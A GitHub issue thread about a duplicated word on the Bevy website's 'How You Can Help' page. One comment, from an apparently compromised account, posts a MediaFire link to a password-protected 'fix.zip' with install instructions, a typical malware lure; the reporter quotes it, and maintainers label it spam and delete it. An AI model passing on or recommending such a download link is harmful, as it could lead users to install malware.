### ISSUE TITLE
Duplicate word in "How can you help" page

### ISSUE THREAD

**Issue by Ggcpp** [bevyengine/bevy-website#1618]
I don't know how to pull request yet but I saw a duplication of the word "avoid" on the page [How Can You Help](https://bevyengine.org/learn/contribute/helping-out/how-you-can-help/) under the **Contributing Code** section in the purple box.

The sentence is
> Communicating your progress early and often can help you **avoid avoid** headaches and disagreements during code review.

As you can see there are two **avoid** which I think is a typing mistake.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ggcpp** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Why would I want to download your file?
Is it related to the issue I just opened?

**Comment by rparrett** [comment]
No, that is spam. Please do not download their file.

**Comment by alice-i-cecile** [comment]
Thanks for reporting this, and sorry about the scammer! They've been reported and their comment deleted.

**Comment by nxllxvxxd** [comment]
> Thanks for reporting this, and sorry about the scammer! They've been reported and their comment deleted.

I'm not a scammer, I don't understand why everyone here seems to think this, this is supposed to be a website with people with some technical knowledge if you took 5 minutes to look at my account you would realize it had been compromised without my knowledge. Nonetheless stop spreading misinformation and instead tell people to watch out so it doesn't happen to them. To assume is to make a ass out of you and me

**Comment by alice-i-cecile** [comment]
The reference was to "the scammer operating your account": account compromises happen and it's not a big deal.

**Comment by nxllxvxxd** [comment]
> The reference was to "the scammer operating your account": account compromises happen and it's not a big deal.

well when you use the phrase "the scammer" that isn't exactly what comes across, i loathe even being attempted to be called something like that
